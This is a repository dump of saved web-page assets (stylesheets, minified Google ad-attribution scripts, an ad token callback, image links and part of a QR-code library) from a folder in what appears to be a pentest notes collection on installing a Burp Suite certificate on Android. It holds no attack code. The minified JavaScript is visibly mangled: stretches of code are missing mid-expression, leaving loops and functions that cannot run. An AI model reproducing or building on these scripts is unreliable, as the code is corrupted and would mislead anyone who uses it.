a:hover{color:#f60;text-decoration:none}.feedbackManage{width:200px;text-align:right;float:right}.feedbackCon{border-bottom:1px solid #ccc;padding:20px 18px 10px 40px;min-height:35px;_height:35px;margin-bottom:1em;line-height:1.5}#divRefreshComments{text-align:right;margin-bottom:10px}.commenttb{width:320px}.entrylistTitle,.PostListTitle,.thumbTitle{font-size:110%;font-weight:bold;border-bottom:1px solid #ccc;padding-bottom:3px;line-height:2em;padding-right:10px}.entrylistDescription{color:#666;text-align:right;padding-top:5px;padding-bottom:5px;padding-right:10px;margin-bottom:10px}.entrylistItem{min-height:20px;_height:20px;margin-bottom:30px;padding-bottom:5px;width:100%}.entrylistPosttitle{font-size:110%;font-weight:bold;border-bottom:1px solid #ccc;line-height:2em;width:100%;padding-left:5px}a.entrylistItemTitle{color:#390}a.entrylistItemTitle:hover{color:#f60}.entrylistPosttitle a:hover{text-decoration:none}.entrylistPostSummary{margin-top:5px;padding-left:5px;margin-bottom:5px}.entrylistItemPostDesc{text-align:right;color:#666}.entrylistItemPostDesc a:link,.entrylistItemPostDesc a:visited,.entrylistItemPostDesc a:active{color:#666}.entrylistItemPostDesc a:hover{color:#f60}.entrylist .postSeparator{clear:both;width:100%;font-size:0;line-height:0;margin:0;padding:0;height:0;border:none}.pager{text-align:right;margin-right:10px}.PostList{border-bottom:1px solid #ccc;clear:both;min-height:1.5em;_height:1.5em;padding-top:10px;padding-left:5px;padding-right:5px;margin-bottom:5px}.postTitl2{float:left}.postDesc2{color:#666;float:right}.postText2{clear:both;color:#666}.pfl_feedback_area_title{line-height:1.5;font-weight:bold;font-size:16px;border-bottom:1px solid #ccc;line-height:2.5em}.pfl_feedback_area_title a,.pfl_feedbackManage a{color:#690;margin:0 10px;font-weight:normal}.pfl_feedback_area_title a:hover,.pfl_feedbackManage a:hover{color:#f60}.pfl_feedbackManage a{margin:0 0 0 0}.pfl_feedbackItem{border-bottom:1px solid #ccc;margin-bottom:20px}.pfl_feedbacksubtitle{width:100%;border-bottom:1px dotted #ccc;height:2.5em;line-height:2.5em}.pfl_feedbackname{float:left;color:#a8b1ba}.pfl_feedbackManage{float:right}.pfl_feedbackCon{color:#000;padding:10px 0}.pfl_feedbackAnswer{color:#f40;text-indent:2em;padding-bottom:10px}.tdSentMessage{text-align:right}.errorMessage{width:300px;float:left}#Profile1_panelAdd td{padding:10px 0}.divPhoto{border:1px solid #ccc;padding:2px;margin-right:10px}.thumbDescription{color:#666;text-align:right;padding-top:5px;padding-bottom:5px;padding-right:10px;margin-bottom:10px}#footer{text-align:center;min-height:15px;_height:15px;border-top:1px solid #000;margin-top:10px;padding-top:10px;margin-bottom:10px}.personInfo{margin-bottom:20px}.pages{text-align:right}.postBody{line-height:1.5}.postBody p,.postCon p{text-indent:2em;margin:0 auto 1em auto}.postBody h2{font-size:150%;margin:15px auto 2px auto;font-weight:bold}.postBody h3{font-size:120%;margin:15px auto 2px auto;font-weight:bold}.postBody h4{font-size:110%;margin:15px auto 2px auto;font-weight:bold;color:#333}.postBody h5{font-size:100%;margin:15px auto 2px auto;font-weight:bold;color:#333}.postBody a:link,.postBody a:visited,.postBody a:active{text-decoration:underline}.postCon a:link,.postCon a:visited,.postCon a:active{text-decoration:underline}.postBody ul,.postCon ul{margin-left:2em}.postBody li,.postCon li{list-style-type:disc;margin-bottom:1em}.postBody blockquote{background:url('images/comment.gif') no-repeat 25px 0;line-height:1.6;color:#333}.div_my_zzk{margin-left:13px}.input_my_zzk{width:120px}.blog_comment_body a:link{text-decoration:underline}#cnblogs_post_body img{max-width:820px}#sidebar_ad,#sidebar_c3{margin:0 auto 15px auto} -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/cnblogs.css: -------------------------------------------------------------------------------- 1 | .hljs { 2 | background: #f5f5f5; 3 | color: black; 4 | display: block; 5 | font-family: "Courier New", sans-serif; 6 | font-size: 13px; 7 | border: 1px solid #ccc; 8 | padding: 5px; 9 | border-radius: 3px; 10 | overflow-x: auto; 11 | } 12 | 13 | .hljs-comment, 14 | .hljs-quote, 15 | .hljs-variable { 16 | color: #008000; 17 | } 18 | 19 | .hljs-keyword, 20 | .hljs-selector-tag, 21 | .hljs-built_in, 22 | .hljs-name, 23 | .hljs-tag { 24 | color: #00f; 25 | } 26 | 27 | .hljs-string, 28 | .hljs-title, 29 | .hljs-section, 30 | .hljs-attribute, 31 | .hljs-literal, 32 | .hljs-template-tag, 33 | .hljs-template-variable, 34 | .hljs-type, 35 | .hljs-addition { 36 | color: #a31515; 37 | } 38 | 39 | .hljs-deletion, 40 | .hljs-selector-attr, 41 | .hljs-selector-pseudo, 42 | .hljs-meta { 43 | color: #2b91af; 44 | } 45 | 46 | .hljs-doctag { 47 | color: #808080; 48 | } 49 | 50 | .hljs-attr { 51 | color: #f00; 52 | } 53 | 54 | .hljs-symbol, 55 | .hljs-bullet, 56 | .hljs-link { 57 | color: #00b0e8; 58 | } 59 | 60 | .hljs-emphasis { 61 | font-style: italic; 62 | } 63 | 64 | .hljs-strong { 65 | font-weight: bold; 66 | } 67 | -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/container.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SafeFrame Container 6 | 14 | 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/f(1).txt: -------------------------------------------------------------------------------- 1 | (function(){/* 2 | 3 | Copyright The Closure Library Authors. 4 | SPDX-License-Identifier: Apache-2.0 5 | */ 6 | 'use strict';var m=this||self;function n(a){return a};function aa(a){aa[" "](a);return a}aa[" "]=function(){};var ba={},p=null;var ca="function"===typeof Uint8Array;const q=Symbol(void 0);function t(a){Object.isFrozen(a)||(q?a[q]|=1:void 0!==a.g?a.g|=1:Object.defineProperties(a,{g:{value:1,configurable:!0,writable:!0,enumerable:!1}}));return a};function da(a){return null!==a&&"object"===typeof a&&!Array.isArray(a)&&a.constructor===Object};function ea(a,b){if(null!=a)return Array.isArray(a)||da(a)?fa(a,b):b(a)}function fa(a,b){if(Array.isArray(a)){var c=Array(a.length);for(let e=0;ee;e++){var f=c.concat(d[e].split(""));ba[e]=f;for(var g=0;g>2];l=b[(l&3)<<4|h>>4];h=b[(h&15)<<2|k>>6];k=b[k&63];c[e++]=g+l+h+k}g=0;k=d;switch(a.length-f){case 2:g=a[f+1],k=b[(g&15)<<2]||d;case 1:a=a[f],c[e]=b[a>>2]+b[(a&3)<<4|g>>4]+k+d}a=c.join("")}}return Array.isArray(a)?fa(a,ha):a};let ia;function ja(a,b){var c=ia;ia=null;a||(a=c);c=this.constructor.W;a||(a=c?[c]:[]);this.i=(c?0:-1)-(this.constructor.V||0);this.j=null;this.g=a;a:{c=this.g.length;a=c-1;if(c&&(c=this.g[a],da(c))){this.l=a-this.i;this.h=c;break a}this.l=Number.MAX_VALUE}if(b)for(a=0;a=a.l?a.h?a.h[b]:void 0:c&&a.h&&a.h[b]?a.h[b]:a.g[b+a.i]}function v(a,b){a=u(a,b);a=null==a?a:!!a;return null==a?!1:a}function oa(a){var b=pa;a.j||(a.j={});const c=a.j[1];if(c)return c;let d=u(a,1,!1);if(null==d)return c;b=new b(d);return a.j[1]=b}ja.prototype.toJSON=function(){return fa(this.g,ha)};function qa(a,b){a=u(a,b);return null==a?0:a}function ra(a,b){a=u(a,b);return null==a?"":a};var pa=class extends ja{constructor(a){super(a,sa)}},sa=[28];var ua=class extends ja{constructor(a){super(a,ta)}},ta=[21];var w;var A=class{constructor(a,b){this.g=b===va?a:""}};A.prototype.toString=function(){return this.g+""};var va={};function wa(a){if(void 0===w){var b=null;var c=m.trustedTypes;if(c&&c.createPolicy){try{b=c.createPolicy("goog#html",{createHTML:n,createScript:n,createScriptURL:n})}catch(d){m.console&&m.console.error(d.message)}w=b}else w=b}a=(b=w)?b.createScriptURL(a):a;return new A(a,va)};/* 10 | 11 | SPDX-License-Identifier: Apache-2.0 12 | */ 13 | function xa(a){let b=!1,c;return function(){b||(c=a(),b=!0);return c}};var ya={passive:!0},za=xa(function(){let a=!1;try{const b=Object.defineProperty({},"passive",{get:function(){a=!0}});m.addEventListener("test",null,b)}catch(b){}return a});function B(a,b,c,d){if(a.addEventListener){var e=a.addEventListener;d=d?d.passive&&za()?d:d.capture||!1:!1;e.call(a,b,c,d)}};function C(a){var b=document;return"string"===typeof a?b.getElementById(a):a}function Aa(a){var b=document;b.getElementsByClassName?a=b.getElementsByClassName(a)[0]:(b=document,a=b.querySelectorAll&&b.querySelector&&a?b.querySelector(a?"."+a:""):Ba(b,a)[0]||null);return a||null} 14 | function Ba(a,b){var c,d;if(a.querySelectorAll&&a.querySelector&&b)return a.querySelectorAll(b?"."+b:"");if(b&&a.getElementsByClassName){var e=a.getElementsByClassName(b);return e}e=a.getElementsByTagName("*");if(b){var f={};for(c=d=0;a=e[c];c++){var g=a.className,k;if(k="function"==typeof g.split)k=0<=Array.prototype.indexOf.call(g.split(/\s+/),b,void 0);k&&(f[d++]=a)}f.length=d;return f}return e}function Ca(a){a&&a.parentNode&&a.parentNode.removeChild(a)};var Da=RegExp("^(?:([^:/?#.]+):)?(?://(?:([^\\\\/?#]*)@)?([^\\\\/?#]*?)(?::([0-9]+))?(?=[\\\\/?#]|$))?([^?#]+)?(?:\\?([^#]*))?(?:#([\\s\\S]*))?$");function G(a){try{var b;if(b=!!a&&null!=a.location.href)a:{try{aa(a.foo);b=!0;break a}catch(c){}b=!1}return b}catch(c){return!1}}function H(a,b){if(a)for(const c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.call(void 0,a[c],c,a)}function Ea(a,b){b=void 0===b?document:b;return b.createElement(String(a).toLowerCase())};function I(a,b){a.google_image_requests||(a.google_image_requests=[]);const c=Ea("IMG",a.document);c.src=b;a.google_image_requests.push(c)}var Ga=()=>{let a="https://pagead2.googlesyndication.com/pagead/gen_204?id=badpubwin";H({stack:Error().stack,aswift:window.google_async_iframe_id},(b,c)=>{b&&(a+=`&${c}=${encodeURIComponent(b)}`)});Fa(a)},Fa=a=>{var b=window;b.fetch?b.fetch(a,{keepalive:!0,credentials:"include",redirect:"follow",method:"get",mode:"no-cors"}):I(b,a)};let Ha=0;function Ia(a){return(a=Ja(a,document.currentScript))&&a.getAttribute("data-jc-version")||"unknown"}function Ja(a,b=null){return b&&b.getAttribute("data-jc")===String(a)?b:document.querySelector(`[${"data-jc"}="${a}"]`)} 15 | function Ka(){if(!(.01(1>=Math.abs(c.left-b.left)&&1>=Math.abs(c.right-b.right)?b.bottom-b.top:b.right-b.left)&&(a=!0)}else a=!1;window.goog_multislot_cache.hd=a}}else a=!1;this.C=a;this.u=C("abgcp"+this.creativeIndexSuffix);this.s=C("abgc"+this.creativeIndexSuffix);this.h=C("abgs"+this.creativeIndexSuffix);C("abgl"+this.creativeIndexSuffix);this.o=C("abgb"+this.creativeIndexSuffix);this.A=C("abgac"+this.creativeIndexSuffix);C("mute_panel"+this.creativeIndexSuffix);this.v=Aa("goog_delegate_attribution"+ 18 | this.creativeIndexSuffix);this.isDelegateAttributionActive=!!this.v&&!!this.I&&!Aa("goog_delegate_disabled")&&!this.B;if(this.h)a:{a=this.h;b="A";c=a.childNodes;for(let d=0;d{a&&H(b,(c,d)=>{a.style[d]=c})};class Ua{constructor(a,b){this.error=a;this.context=b.context;this.msg=b.message||"";this.id=b.id||"jserror";this.meta={}}};const Va=RegExp("^https?://(\\w|-)+\\.cdn\\.ampproject\\.(net|org)(\\?|/|$)");var Wa=class{constructor(a,b){this.g=a;this.h=b}},Xa=class{constructor(a,b){this.url=a;this.G=!!b;this.depth=null}};function P(a,b){const c={};c[a]=b;return[c]}function Ya(a,b,c,d,e){const f=[];H(a,function(g,k){(g=Za(g,b,c,d,e))&&f.push(k+"="+g)});return f.join(b)} 20 | function Za(a,b,c,d,e){if(null==a)return"";b=b||"&";c=c||",$";"string"==typeof c&&(c=c.split(""));if(a instanceof Array){if(d=d||0,de?encodeURIComponent(Ya(a,b,c,d,e+1)):"...";return encodeURIComponent(String(a))}function $a(a){let b=1;for(const c in a.h)b=c.length>b?c.length:b;return 3997-b-a.i.length-1} 21 | function ab(a,b,c){b=b+"//pagead2.googlesyndication.com"+c;let d=$a(a)-c.length;if(0>d)return"";a.g.sort(function(f,g){return f-g});c=null;let e="";for(let f=0;f=h.length){d-=h.length;b+=h;e=a.i;break}c=null==c?g:c}}}a="";null!=c&&(a=e+"trn="+c);return b+a}class bb{constructor(){this.i="&";this.h={};this.j=0;this.g=[]}};function cb(){var a=db,b=Q.google_srt;0<=b&&1>=b&&(a.g=b)}function eb(a,b,c,d,e){if((d?a.g:Math.random())<(e||.01))try{let f;c instanceof bb?f=c:(f=new bb,H(c,(k,l)=>{var h=f,r=h.j++;k=P(l,k);h.g.push(r);h.h[r]=k}));const g=ab(f,a.h,"/pagead/gen_204?id="+b+"&");g&&I(m,g)}catch(f){}}class fb{constructor(){var a=void 0===a?K:a;this.h="http:"===a.location.protocol?"http:":"https:";this.g=Math.random()}};let R=null;var gb=()=>{const a=m.performance;return a&&a.now&&a.timing?Math.floor(a.now()+a.timing.navigationStart):Date.now()},hb=()=>{const a=m.performance;return a&&a.now?a.now():null};class ib{constructor(a,b){var c=hb()||gb();this.label=a;this.type=b;this.value=c;this.duration=0;this.uniqueId=Math.random();this.slotId=void 0}};const S=m.performance,jb=!!(S&&S.mark&&S.measure&&S.clearMarks),T=xa(()=>{var a;if(a=jb){var b;if(null===R){R="";try{a="";try{a=m.top.location.hash}catch(c){a=m.location.hash}a&&(R=(b=a.match(/\bdeid=([\d,]+)/))?b[1]:"")}catch(c){}}b=R;a=!!b.indexOf&&0<=b.indexOf("1337")}return a});function kb(a){a&&S&&T()&&(S.clearMarks(`goog_${a.label}_${a.uniqueId}_start`),S.clearMarks(`goog_${a.label}_${a.uniqueId}_end`))} 22 | class lb{constructor(){var a=Q;this.h=[];this.i=a||m;let b=null;a&&(a.google_js_reporting_queue=a.google_js_reporting_queue||[],this.h=a.google_js_reporting_queue,b=a.google_measure_js_timing);this.g=T()||(null!=b?b:1>Math.random())}start(a,b){if(!this.g)return null;a=new ib(a,b);b=`goog_${a.label}_${a.uniqueId}_start`;S&&T()&&S.mark(b);return a}end(a){if(this.g&&"number"===typeof a.value){a.duration=(hb()||gb())-a.value;var b=`goog_${a.label}_${a.uniqueId}_end`;S&&T()&&S.mark(b);!this.g||2048nb(c,a,()=>b.apply(void 0,d))} 25 | class pb{constructor(){var a=qb;this.l=db;this.h=null;this.m=this.j;this.g=void 0===a?null:a;this.i=!1}j(a,b,c,d,e){e=e||"jserror";let f;try{const x=new bb;var g=x;g.g.push(1);g.h[1]=P("context",a);b.error&&b.meta&&b.id||(b=new Ua(b,{message:mb(b)}));if(b.msg){g=x;var k=b.msg.substring(0,512);g.g.push(2);g.h[2]=P("msg",k)}var l=b.meta||{};b=l;if(this.h)try{this.h(b)}catch(D){}if(d)try{d(b)}catch(D){}d=x;l=[l];d.g.push(3);d.h[3]=l;d=m;l=[];b=null;do{var h=d;if(G(h)){var r=h.location.href;b=h.document&& 26 | h.document.referrer||null}else r=b,b=null;l.push(new Xa(r||""));try{d=h.parent}catch(D){d=null}}while(d&&h!=d);for(let D=0,Oa=l.length-1;D<=Oa;++D)l[D].depth=Oa-D;h=m;if(h.location&&h.location.ancestorOrigins&&h.location.ancestorOrigins.length==l.length-1)for(r=1;rMath.random()&&Ga();const Q=N,qb=new lb;var rb=()=>{if(!Q.google_measure_js_timing){var a=qb;a.g=!1;a.h!=a.i.google_js_reporting_queue&&(T()&&Array.prototype.forEach.call(a.h,kb,void 0),a.h.length=0)}}; 28 | (a=>{db=null!=a?a:new fb;"number"!==typeof Q.google_srt&&(Q.google_srt=Math.random());cb();U=new pb;U.h=b=>{const c=Ha;0!==c&&(b.jc=String(c),b.shv=Ia(c))};U.i=!0;"complete"==Q.document.readyState?rb():qb.g&&B(Q,"load",()=>{rb()})})();var V=(a,b)=>ob(a,b);function sb(a){if(a.g.l&&a.g.P){const b=oa(a.g.g);b&&null!=u(b,5)&&null!=u(b,6)&&(a.i=new Sa(ra(b,5),ra(b,19)));B(a.g.l,"click",V(452,()=>{if(!a.j&&(a.j=!0,a.i)){var c=a.i;let d=c.h+"&label=closebutton_whythisad_click";d+="&label_instance=1";c.g&&(d+="&cid="+c.g);I(window,d)}}))}} 29 | function tb(a){if(a.g.S)B(a.g.i,"click",V(365,b=>{const c=K.goog_interstitial_display;c&&(c(b),b&&(b.stopPropagation(),b.preventDefault()))}));else if(a.g.isMutableImpression&&a.g.isMobileDevice)B(a.g.i,"click",()=>a.h());else if(a.g.isMutableImpression&&!a.g.isMobileDevice&&(a.g.j&&(B(a.g.j,"click",()=>a.h()),B(a.g.j,"keydown",b=>{"Enter"!==b.code&&"Space"!==b.code||a.h()})),a.g.U&&a.g.h&&B(a.g.h,"click",()=>a.h())),a.g.K)ub(a);else{B(a.g.i,"mouseover",V(367,()=>ub(a)));B(a.g.i,"mouseout",V(369, 30 | ()=>vb(a,500)));B(a.g.i,"touchstart",V(368,()=>ub(a)),ya);const b=V(370,()=>vb(a,4E3));B(a.g.i,"mouseup",b);B(a.g.i,"touchend",b);B(a.g.i,"touchcancel",b);a.g.l&&B(a.g.l,"click",V(371,c=>a.preventDefault(c)))}}function ub(a){window.clearTimeout(a.g.m);a.g.m=null;a.g.h&&"block"==a.g.h.style.display||(a.g.F=Date.now(),a.g.o&&a.g.h&&(a.g.o.style.display="none",a.g.h.style.display="block"))}function vb(a,b){window.clearTimeout(a.g.m);a.g.m=window.setTimeout(()=>wb(a),b)} 31 | function yb(a){const b=a.g.A;b.style.display="block";a.g.enableNativeJakeUi&&window.requestAnimationFrame(()=>{L(b,"abgacfo")})}function wb(a){window.clearTimeout(a.g.m);a.g.m=null;a.g.o&&a.g.h&&(a.g.o.style.display="block",a.g.h.style.display="none")} 32 | class zb{constructor(a,b){this.g=a;this.h=b;this.g.T||(this.j=!1,this.i=null,!this.g.C||this.g.adbadgeEnabled||this.g.L?sb(this):(a={display:"none"},b={width:"15px",height:"15px"},this.g.isMobileDevice?(O(this.g.o,a),O(this.g.h,a),O(this.g.u,b),O(this.g.s,b)):O(this.g.s,a)),tb(this),this.g.enableNativeJakeUi&&L(this.g.A,"abgnac"),this.g.isDelegateAttributionActive?(L(document.body,"goog_delegate_active"),L(document.body,"jaa")):(!this.g.isMutableImpression&&this.g.j&&Ca(this.g.j),setTimeout(()=>{L(document.body, 33 | "jar")},this.g.J?750:100)),this.g.B&&L(document.body,"goog_delegate_disabled"),this.g.H&&K.addEventListener("load",()=>this.h()))}preventDefault(a){if(this.g.h&&"block"==this.g.h.style.display&&500>Date.now()-this.g.F)a.preventDefault?a.preventDefault():a.returnValue=!1;else if(this.g.openAttributionInline){var b=this.g.l.getAttribute("href");window.adSlot?window.adSlot.openAttribution(b)&&(a.preventDefault?a.preventDefault():a.returnValue=!1):window.openAttribution&&(window.openAttribution(b),a.preventDefault? 34 | a.preventDefault():a.returnValue=!1)}else this.g.O&&(b=this.g.l.getAttribute("href"),window.adSlot?window.adSlot.openSystemBrowser(b)&&(a.preventDefault?a.preventDefault():a.returnValue=!1):window.openSystemBrowser&&(window.openSystemBrowser(b),a.preventDefault?a.preventDefault():a.returnValue=!1))}};function Ab(a){if(!a.g&&(a.g=!0,K.goog_delegate_deferred_token=void 0,a.h)){var b=a.i;a=a.h;if(!a)throw Error("bad attrdata");a=new Na(a);new b(a)}}class Bb{constructor(a){var b=Cb;if(!b)throw Error("bad ctor");this.i=b;this.h=a;this.g=!1;Aa("goog_delegate_deferred")?void 0!==K.goog_delegate_deferred_token?Ab(this):(a=()=>{Ab(this)},K.goog_delegate_deferred_token=a,setTimeout(a,5E3)):Ab(this)}};var Db=(a=[])=>{m.google_logging_queue||(m.google_logging_queue=[]);m.google_logging_queue.push([11,a])};class Eb{constructor(){this.promise=new Promise(a=>{this.g=a})}};var Fb=class{constructor(){const a=new Eb;this.promise=a.promise;this.resolve=a.g}},Gb=(a,b)=>{a.google_llp||(a.google_llp={});a=a.google_llp;a[5]||(a[5]=new Fb,b&&b());return a[5]}; 35 | function Hb(a,b){return Gb(a,function(){var c=a.document;const d=Ea("SCRIPT",c);d.src=b instanceof A&&b.constructor===A?b.g:"type_error:TrustedResourceUrl";var e;const f=(d.ownerDocument&&d.ownerDocument.defaultView||window).document,g=null===(e=f.querySelector)||void 0===e?void 0:e.call(f,"script[nonce]");(e=g?g.nonce||g.getAttribute("nonce")||"":"")&&d.setAttribute("nonce",e);(c=c.getElementsByTagName("script")[0])&&c.parentNode&&c.parentNode.insertBefore(d,c)}).promise};function Ib(a){nb(U,373,()=>{wb(a.h);yb(a.h)});Hb(window,wa(`https://${"pagead2.googlesyndication.com"}${"/pagead/js/"+ra(a.g.g,33)+"/abg_survey.js"}`)).then(b=>{b.createAttributionCard(a.g);a.g.R=b;b.expandAttributionCard()});Ka()}class Cb{constructor(a){this.g=a;this.h=new zb(this.g,V(359,()=>Ib(this)))}};Ha=60;function Jb(a){Db([a]);new Bb(a)}var W=["buildAttribution"],X=m;W[0]in X||"undefined"==typeof X.execScript||X.execScript("var "+W[0]);for(var Z;W.length&&(Z=W.shift());)W.length||void 0===Jb?X[Z]&&X[Z]!==Object.prototype[Z]?X=X[Z]:X=X[Z]={}:X[Z]=Jb;}).call(this); 36 | -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/f(2).txt: -------------------------------------------------------------------------------- 1 | (function(){/* 2 | 3 | Copyright The Closure Library Authors. 4 | SPDX-License-Identifier: Apache-2.0 5 | */ 6 | 'use strict';const e=Symbol(void 0);var g=Object,h=g.freeze,k=[];Object.isFrozen(k)||(e?k[e]|=1:void 0!==k.g?k.g|=1:Object.defineProperties(k,{g:{value:1,configurable:!0,writable:!0,enumerable:!1}}));h.call(g,k);/* 7 | 8 | SPDX-License-Identifier: Apache-2.0 9 | */ 10 | function l(a,b,d){a.addEventListener&&a.addEventListener(b,d,!1)};function m(a,b,d){if(Array.isArray(b))for(var c=0;c{if(q[a.h])a.g&&(a.g=!1,a.j=Date.now(),v(a,0));else{if(-1!==a.j){const b=Date.now()-a.j;0{a.handleClick(b)})} 11 | function v(a,b,d=0){var c={gqid:a.m,qqid:a.o};0===b&&(c["return"]=0);1===b&&(c["return"]=1,c.timeDelta=d);2===b&&(c.bgload=1);3===b&&(c.fg=1);b=[];for(var f in c)m(f,c[f],b);n(r,a.l+"&label=window_focus&"+b.join("&"));if(!(.01{this.g=!1},5E3)}};const z=p(document.currentScript);if(null==z)throw Error("JSC not found 22");var x;const A={},B=z.attributes;for(let a=B.length-1;0<=a;a--){const b=B[a].name;0===b.indexOf("data-jcp-")&&(A[b.substring(9)]=B[a].value)}x=A;window.window_focus_for_click=new y;}).call(this); 14 | -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/f.txt: -------------------------------------------------------------------------------- 1 | processGoogleToken({"newToken":"ChAIgPvbjQYQi9PBnYqHzvdjEj0AyuH72XDJR7zBjEG4V1PFpXd0MYaEdNFgeEyjQAb7tXvGTp1qmIObi3ELkpHRrv4pXaLus4S2AG0lhndy","validLifetimeSecs":300,"freshLifetimeSecs":300,"1p_jar":"2021-12-14-04","pucrd":""}); -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/harmoonos-developer-competition-2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/harmoonos-developer-competition-2.jpg -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/icon_weibo_24.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/icon_weibo_24.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/lite-mode-check.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/logo.gif -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/logo.svg: -------------------------------------------------------------------------------- 1 | 博客园logo -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/message.svg: -------------------------------------------------------------------------------- 1 | 2 | 4 | -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/myblog.svg: -------------------------------------------------------------------------------- 1 | 2 | 4 | -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/newpost.svg: -------------------------------------------------------------------------------- 1 | 2 | 4 | -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/search.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/sodar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/sodar -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/tctip.min.js.下载: -------------------------------------------------------------------------------- 1 | /// 2 | //--------------------------------------------------------------------- 3 | // QRCode for JavaScript 4 | function QR8bitByte(a){this.mode=QRMode.MODE_8BIT_BYTE;this.data=a}QR8bitByte.prototype={getLength:function(a){return this.data.length},write:function(a){for(var b=0;ba||this.moduleCount<=a||0>b||this.moduleCount<=b)throw Error(a+","+b);return this.modules[a][b]},getModuleCount:function(){return this.moduleCount},make:function(){if(1>this.typeNumber){for(var a=1,a=1;40>a;a++){for(var b=QRRSBlock.getRSBlocks(a,this.errorCorrectLevel),d=new QRBitBuffer,c=0,e=0;e=d;d++)if(!(-1>=a+d||this.moduleCount<=a+d))for(var c=-1;7>=c;c++)-1>=b+c||this.moduleCount<=b+c||(this.modules[a+d][b+c]=0<=d&&6>=d&&(0==c||6==c)||0<=c&&6>=c&&(0==d||6==d)||2<=d&&4>=d&&2<=c&&4>=c?!0:!1)},getBestMaskPattern:function(){for(var a=0,b=0,d=0;8>d;d++){this.makeImpl(!0,d);var c=QRUtil.getLostPoint(this);if(0==d||a>c)a=c,b=d}return b},createMovieClip:function(a,b,d){a=a.createEmptyMovieClip(b,d);this.make();for(b=0;b=f;f++)for(var h=-2;2>=h;h++)this.modules[c+f][e+h]=-2==f||2==f||-2==h||2==h||0==f&&0==h?!0:!1}},setupTypeNumber:function(a){for(var b=QRUtil.getBCHTypeNumber(this.typeNumber),d=0;18>d;d++){var c=!a&&1==(b>>d&1);this.modules[Math.floor(d/3)][d%3+this.moduleCount-8-3]=c}for(d=0;18>d;d++)c=!a&&1==(b>>d&1),this.modules[d%3+this.moduleCount-8-3][Math.floor(d/3)]=c},setupTypeInfo:function(a,b){for(var d=QRUtil.getBCHTypeInfo(this.errorCorrectLevel<<3|b),c=0;15>c;c++){var e=!a&&1==(d>>c&1);6>c?this.modules[c][8]=e:8>c?this.modules[c+1][8]=e:this.modules[this.moduleCount-15+c][8]=e}for(c=0;15>c;c++)e=!a&&1==(d>>c&1),8>c?this.modules[8][this.moduleCount-c-1]=e:9>c?this.modules[8][15-c-1+1]=e:this.modules[8][15-c-1]=e;this.modules[this.moduleCount-8][8]=!a},mapData:function(a,b){for(var d=-1,c=this.moduleCount-1,e=7,f=0,h=this.moduleCount-1;0g;g++)if(null==this.modules[c][h-g]){var k=!1;f>>e&1));QRUtil.getMask(b,c,h-g)&&(k=!k);this.modules[c][h-g]=k;e--; -1==e&&(f++,e=7)}c+=d;if(0>c||this.moduleCount<=c){c-=d;d=-d;break}}}};QRCode.PAD0=236;QRCode.PAD1=17;QRCode.createData=function(a,b,d){b=QRRSBlock.getRSBlocks(a,b);for(var c=new QRBitBuffer,e=0;e8*a)throw Error("code length overflow. ("+c.getLengthInBits()+"\x3e"+8*a+")");for(c.getLengthInBits()+4<=8*a&&c.put(0,4);0!=c.getLengthInBits()%8;)c.putBit(!1);for(;!(c.getLengthInBits()>=8*a);){c.put(QRCode.PAD0,8);if(c.getLengthInBits()>=8*a)break;c.put(QRCode.PAD1,8)}return 